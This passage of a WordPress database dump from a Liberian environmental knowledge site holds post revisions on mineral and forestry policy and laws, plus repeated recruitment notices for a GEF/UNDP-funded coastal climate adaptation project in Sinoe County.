revitalization of the country. The advantage of offering a coordinated policy Framework is that international economic relations are increased and regional and international trade enhanced.','Mineral Policy of Liberia','','inherit','closed','closed','','1701-revision-v1','','','2022-07-28 14:13:29','2022-07-28 14:13:29','',1701,'https://ekmsliberia.info/?p=4817',0,'revision','',0),(4819,42,'2022-07-28 14:15:44','2022-07-28 14:15:44','Liberia is situated within the tropical rain forest belt on the West Coast of Africa. The total land area is 9.58 million hectares, of which forests cover about 4.30 million hectares or 45 percent of the land area (see Table 1). In recent years, the forest area has decreased somewhat, largely due to uncontrolled logging and an expansion of land used for agriculture. The annual rate of deforestation is currently estimated to be about 12,000 hectares (0.3 percent), while the recorded planting of new forests to date has amounted to only about 11,000 hectares in total.','National Forestry Policy and Implementation Strategy','','inherit','closed','closed','','1703-revision-v1','','','2022-07-28 14:15:44','2022-07-28 14:15:44','',1703,'https://ekmsliberia.info/?p=4819',0,'revision','',0),(4820,42,'2022-07-28 14:18:13','2022-07-28 14:18:13','THIS IS AN ACT ADOPTING A NEW MINERALS AND MINING LAW, PART 1, TITLE 23, LIBERIAN CODE OF LAWS REVISED, APPROVED APRIL 3, 2000, PUBLISHED BY AUTHORITY, MINISTRY OF FOREIGN AFFAIRS, SEPTEMBER 20,','An Act Adopting a New Minerals and Mining Law','','inherit','closed','closed','','1705-autosave-v1','','','2022-07-28 14:18:13','2022-07-28 14:18:13','',1705,'https://ekmsliberia.info/?p=4820',0,'revision','',0),(4821,42,'2022-07-28 14:19:42','2022-07-28 14:19:42','THIS IS AN ACT ADOPTING A NEW MINERALS AND MINING LAW, PART 1, TITLE 23, LIBERIAN CODE OF LAWS REVISED, APPROVED APRIL 3, 2000, PUBLISHED BY AUTHORITY, MINISTRY OF FOREIGN AFFAIRS, SEPTEMBER 20, 2000.','An Act Adopting a New Minerals and Mining Law','','inherit','closed','closed','','1705-revision-v1','','','2022-07-28 14:19:42','2022-07-28 14:19:42','',1705,'https://ekmsliberia.info/?p=4821',0,'revision','',0),(4822,42,'2022-07-28 14:20:43','2022-07-28 14:20:43','AN ACT ADOPTING THE NATIONAL FORESTRY REFORM LAW OF 2006 (AMENDING THE NATIONAL FORESTRY LAW OF 2000, AS AMENDED; AND AMENDING AN ACT CREATING THE FORESTRY DEVELOPMENT AUTHORITY, AS AMENDED)','An Act Adopting a New Forestry Reform Law','','inherit','closed','closed','','1707-autosave-v1','','','2022-07-28 14:20:43','2022-07-28 14:20:43','',1707,'https://ekmsliberia.info/?p=4822',0,'revision','',0),(4823,42,'2022-07-28 14:22:11','2022-07-28 14:22:11','AN ACT ADOPTING THE NATIONAL FORESTRY REFORM LAW OF 2006 (AMENDING THE NATIONAL FORESTRY LAW OF 2000, AS AMENDED; AND AMENDING AN ACT CREATING THE FORESTRY DEVELOPMENT AUTHORITY, AS AMENDED)','An Act Adopting a New Forestry Reform Law','','inherit','closed','closed','','1707-revision-v1','','','2022-07-28 14:22:11','2022-07-28 14:22:11','',1707,'https://ekmsliberia.info/?p=4823',0,'revision','',0),(4824,42,'2022-07-28 14:39:52','2022-07-28 14:39:52','This work is a product of the staff of The World Bank. The findings, interpretations, and conclusions expressed in this work do not necessarily reflect the views of the Executive Directors of The World Bank or the governments they represent. The World Bank does not guarantee the accuracy of the data included in this work. The boundaries, colors, denominations, and other information shown on any map in this work do not imply any judgment on the part of The World Bank concerning the legal status of any territory or the endorsement or acceptance of such boundaries.','Liberia: Country Forest Note','','inherit','closed','closed','','1709-revision-v1','','','2022-07-28 14:39:52','2022-07-28 14:39:52','',1709,'https://ekmsliberia.info/?p=4824',0,'revision','',0),(4826,42,'2022-08-02 19:07:28','2022-08-02 19:07:28','','PMU ADVERT - websites EDITED','','inherit','open','closed','','pmu-advert-websites-edited','','','2022-08-02 19:07:28','2022-08-02 19:07:28','',0,'https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf',0,'attachment','application/pdf',0),(4827,42,'2022-08-02 19:15:00','2022-08-02 19:15:00','<span id=\"page3R_mcid17\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The </span><span dir=\"ltr\" role=\"presentation\">Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Project which is financed </span><span dir=\"ltr\" role=\"presentation\">by a GEF Trust Fund grant of USD$8.9 million and co</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">financed</span> <span dir=\"ltr\" role=\"presentation\">by UNDP and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). <span id=\"page22R_mcid0\" class=\"markedContent\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.</span></span></span><span id=\"page3R_mcid18\" class=\"markedContent\"></span><span id=\"page3R_mcid19\" class=\"markedContent\"></span>\r\n<div class=\"canvasWrapper\"><em><strong>Link: </strong><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Project Manager Wanted</strong></a></em></div>','Recruitment for Project Manager for Sinoe County Project','','publish','closed','closed','','recruitment-for-project-manager-for-sinoe-county-project','','','2022-08-03 07:00:54','2022-08-03 07:00:54','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4827',77,'ekms_bulletin','',0),(4828,42,'2022-08-02 19:15:00','2022-08-02 19:15:00','<span id=\"page3R_mcid17\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The </span><span dir=\"ltr\" role=\"presentation\">Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Project which is financed </span><span dir=\"ltr\" role=\"presentation\">by a GEF Trust Fund grant of USD$8.9 million and co</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">financed</span> <span dir=\"ltr\" role=\"presentation\">by UNDP and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). <span id=\"page22R_mcid0\" class=\"markedContent\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.</span></span></span><span id=\"page3R_mcid18\" class=\"markedContent\"></span><span id=\"page3R_mcid19\" class=\"markedContent\"></span>\r\n<div class=\"canvasWrapper\"><em><strong>Link: </strong><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Project Manager Wanted</strong></a></em></div>','Consultancy to Project Manager for PMU Project','','inherit','closed','closed','','4827-revision-v1','','','2022-08-02 19:15:00','2022-08-02 19:15:00','',4827,'https://ekmsliberia.info/?p=4828',0,'revision','',0),(4829,42,'2022-08-02 19:15:09','2022-08-02 19:15:09','<span id=\"page3R_mcid17\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The </span><span dir=\"ltr\" role=\"presentation\">Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Project which is financed </span><span dir=\"ltr\" role=\"presentation\">by a GEF Trust Fund grant of USD$8.9 million and co</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">financed</span> <span dir=\"ltr\" role=\"presentation\">by UNDP and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). <span id=\"page22R_mcid0\" class=\"markedContent\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.</span></span></span><span id=\"page3R_mcid18\" class=\"markedContent\"></span><span id=\"page3R_mcid19\" class=\"markedContent\"></span>\r\n<div class=\"canvasWrapper\"><em><strong>Link: </strong><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Project Manager Wanted</strong></a></em></div>','Consultancy for Project Manager for PMU Project','','inherit','closed','closed','','4827-revision-v1','','','2022-08-02 19:15:09','2022-08-02 19:15:09','',4827,'https://ekmsliberia.info/?p=4829',0,'revision','',0),(4830,42,'2022-08-02 20:04:40','2022-08-02 20:04:40','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Project Assistant Wanted</a></em></strong>','Recruitment for Project Assistant for Sinoe County Project','','publish','closed','closed','','recruitment-for-project-assistant-for-sinoe-county-project','','','2022-08-03 07:01:55','2022-08-03 07:01:55','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4830',76,'ekms_bulletin','',0),(4831,42,'2022-08-02 20:04:40','2022-08-02 20:04:40','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<strong><em>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Project Assistant Wanted</a></em></strong>','Consultancy for Project Assistant for PMU Project','','inherit','closed','closed','','4830-revision-v1','','','2022-08-02 20:04:40','2022-08-02 20:04:40','',4830,'https://ekmsliberia.info/?p=4831',0,'revision','',0),(4832,42,'2022-08-02 20:08:55','2022-08-02 20:08:55','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">CTA Wanted</a></strong></em>','Recruitment for Chief Technical Advisor for Sinoe County Project','','publish','closed','closed','','recruitment-for-chief-technical-advisor-for-sinoe-county-project','','','2022-08-03 07:02:41','2022-08-03 07:02:41','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4832',75,'ekms_bulletin','',0),(4833,42,'2022-08-02 20:08:55','2022-08-02 20:08:55','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">CTA Wanted</a></strong></em>','Consultancy for Chief Technical Advisor','','inherit','closed','closed','','4832-revision-v1','','','2022-08-02 20:08:55','2022-08-02 20:08:55','',4832,'https://ekmsliberia.info/?p=4833',0,'revision','',0),(4834,42,'2022-08-02 20:09:35','2022-08-02 20:09:35','<span id=\"page22R_mcid0\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal </span><span dir=\"ltr\" role=\"presentation\">communities and their livelihoods to the impacts of climate change, focusing on women and youth. </span><span dir=\"ltr\" role=\"presentation\">Spec</span><span dir=\"ltr\" role=\"presentation\">ifically, project interventions include: i) strengthening institutional capacity for climate change </span><span dir=\"ltr\" role=\"presentation\">adaptation planning; ii) supporting innovative technologies for climate information and communication </span><span dir=\"ltr\" role=\"presentation\">management;</span> <span dir=\"ltr\" role=\"presentation\">iii)</span> <span dir=\"ltr\" role=\"presentation\">introducing</span> <span dir=\"ltr\" role=\"presentation\">hybrid</span> <span dir=\"ltr\" role=\"presentation\">adaptation</span> <span dir=\"ltr\" role=\"presentation\">solutio</span><span dir=\"ltr\" role=\"presentation\">ns;</span> <span dir=\"ltr\" role=\"presentation\">and</span> <span dir=\"ltr\" role=\"presentation\">iv)</span> <span dir=\"ltr\" role=\"presentation\">supporting</span> <span dir=\"ltr\" role=\"presentation\">resilient</span> <span dir=\"ltr\" role=\"presentation\">livelihood </span><span dir=\"ltr\" role=\"presentation\">diversification through training and improved access to finance.</span></span>\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">CTA Wanted</a></strong></em>','Consultancy for Chief Technical Advisor for PMU Project','','inherit','closed','closed','','4832-revision-v1','','','2022-08-02 20:09:35','2022-08-02 20:09:35','',4832,'https://ekmsliberia.info/?p=4834',0,'revision','',0),(4835,42,'2022-08-02 20:12:02','2022-08-02 20:12:02','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Recruitment for Project Administration & Finance Officer for Sinoe County Project','','publish','closed','closed','','recruitment-for-project-administration-finance-officer-for-sinoe-county-project','','','2022-08-03 07:03:33','2022-08-03 07:03:33','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4835',74,'ekms_bulletin','',0),(4836,42,'2022-08-02 20:12:02','2022-08-02 20:12:02','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Consultant Wanted</a></strong></em>','Consultancy for Project Administration & Finance Officer for PMU Project','','inherit','closed','closed','','4835-revision-v1','','','2022-08-02 20:12:02','2022-08-02 20:12:02','',4835,'https://ekmsliberia.info/?p=4836',0,'revision','',0),(4837,42,'2022-08-02 20:13:59','2022-08-02 20:13:59','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Officer Wanted</a></strong></em>','Recruitment for Procurement Officer for Sinoe County Project','','publish','closed','closed','','recruitment-for-procurement-officer-for-sinoe-county-project','','','2022-08-03 07:04:17','2022-08-03 07:04:17','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4837',73,'ekms_bulletin','',0),(4838,42,'2022-08-02 20:13:59','2022-08-02 20:13:59','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Officer Wanted</a></strong></em>','Consultancy for Project Procurement Officer for PMU Project','','inherit','closed','closed','','4837-revision-v1','','','2022-08-02 20:13:59','2022-08-02 20:13:59','',4837,'https://ekmsliberia.info/?p=4838',0,'revision','',0),(4839,42,'2022-08-02 20:14:58','2022-08-02 20:14:58','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Procurement Officer Wanted</a></strong></em>','Consultancy for Procurement Officer for PMU Project','','inherit','closed','closed','','4837-revision-v1','','','2022-08-02 20:14:58','2022-08-02 20:14:58','',4837,'https://ekmsliberia.info/?p=4839',0,'revision','',0),(4840,42,'2022-08-02 20:16:39','2022-08-02 20:16:39','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">M&amp;E Officer Wanted</a></strong></em>','Recruitment for Monitoring & Evaluation Officer for Sinoe County Project','','publish','closed','closed','','recruitment-for-monitoring-evaluation-officer-for-sinoe-county-project','','','2022-08-03 07:04:52','2022-08-03 07:04:52','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4840',72,'ekms_bulletin','',0),(4841,42,'2022-08-02 20:16:39','2022-08-02 20:16:39','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">M&amp;E Officer Wanted</a></strong></em>','Consultancy for Monitoring & Evaluation Officer for PMU Project','','inherit','closed','closed','','4840-revision-v1','','','2022-08-02 20:16:39','2022-08-02 20:16:39','',4840,'https://ekmsliberia.info/?p=4841',0,'revision','',0),(4842,42,'2022-08-02 20:18:41','2022-08-02 20:18:41','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Gender Officer Wanted</a></strong></em>','Recruitment for Gender Officer for Sinoe County Project','','publish','closed','closed','','recruitment-for-gender-officer-for-sinoe-county-project','','','2022-08-03 07:05:35','2022-08-03 07:05:35','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4842',71,'ekms_bulletin','',0),(4843,42,'2022-08-02 20:18:41','2022-08-02 20:18:41','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Gender Officer Wanted</a></strong></em>','Consultancy for Gender Officer for PMU Project','','inherit','closed','closed','','4842-revision-v1','','','2022-08-02 20:18:41','2022-08-02 20:18:41','',4842,'https://ekmsliberia.info/?p=4843',0,'revision','',0),(4845,42,'2022-08-02 20:20:57','2022-08-02 20:20:57','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></strong></em>','Recruitment for Safeguard Officer for Sinoe County Project','','publish','closed','closed','','recruitment-for-safeguard-officer-for-sinoe-county-project','','','2022-08-03 07:06:16','2022-08-03 07:06:16','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=4845',70,'ekms_bulletin','',0),(4846,42,'2022-08-02 20:20:57','2022-08-02 20:20:57','The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.\r\n\r\n<em><strong>Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\">Safeguard Officer Wanted</a></strong></em>','Consultancy for Safeguard Officer for PMU Project','','inherit','closed','closed','','4845-revision-v1','','','2022-08-02 20:20:57','2022-08-02 20:20:57','',4845,'https://ekmsliberia.info/?p=4846',0,'revision','',0),(4848,42,'2022-08-03 07:00:35','2022-08-03 07:00:35','<span id=\"page3R_mcid17\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The </span><span dir=\"ltr\" role=\"presentation\">Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Project which is financed </span><span dir=\"ltr\" role=\"presentation\">by a GEF Trust Fund grant of USD$8.9 million and co</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">financed</span> <span dir=\"ltr\" role=\"presentation\">by UNDP and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). <span id=\"page22R_mcid0\" class=\"markedContent\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.</span></span></span><span id=\"page3R_mcid18\" class=\"markedContent\"></span><span id=\"page3R_mcid19\" class=\"markedContent\"></span>\n<div class=\"canvasWrapper\"><em><strong>Link: </strong><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Project Manager Wanted</strong></a></em></div>','Recruitment for Project Manager for Sinoe County Project','','inherit','closed','closed','','4827-autosave-v1','','','2022-08-03 07:00:35','2022-08-03 07:00:35','',4827,'https://ekmsliberia.info/?p=4848',0,'revision','',0),(4849,42,'2022-08-03 07:00:54','2022-08-03 07:00:54','<span id=\"page3R_mcid17\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">The </span><span dir=\"ltr\" role=\"presentation\">Environmental Protection Agency of Liberia (EPA) is the Executing Entity for the Project which is financed </span><span dir=\"ltr\" role=\"presentation\">by a GEF Trust Fund grant of USD$8.9 million and co</span><span dir=\"ltr\" role=\"presentation\">-</span><span dir=\"ltr\" role=\"presentation\">financed</span> <span dir=\"ltr\" role=\"presentation\">by UNDP and the Government of Liberia </span><span dir=\"ltr\" role=\"presentation\">(GoL). <span id=\"page22R_mcid0\" class=\"markedContent\">The proposed project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youth. Specifically, project interventions include: i) strengthening institutional capacity for climate change adaptation planning; ii) supporting innovative technologies for climate information and communication management; iii) introducing hybrid adaptation solutions; and iv) supporting resilient livelihood diversification through training and improved access to finance.</span></span></span><span id=\"page3R_mcid18\" class=\"markedContent\"></span><span id=\"page3R_mcid19\" class=\"markedContent\"></span>\r\n<div class=\"canvasWrapper\"><em><strong>Link: </strong><a href=\"https://ekmsliberia.info/wp-content/uploads/2022/08/PMU-ADVERT-websites-EDITED.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Project Manager Wanted</strong></a></em></div>','Recruitment for Project Manager for Sinoe County Project','','inherit','closed','closed','','4827-revision-v1','','','2022-08-03 07:00:54','2022-08-03 07:00:54','',4827,'https://ekmsliberia.info/?p=4849',0,'revision','',0),(4850,42,'2022-08-03 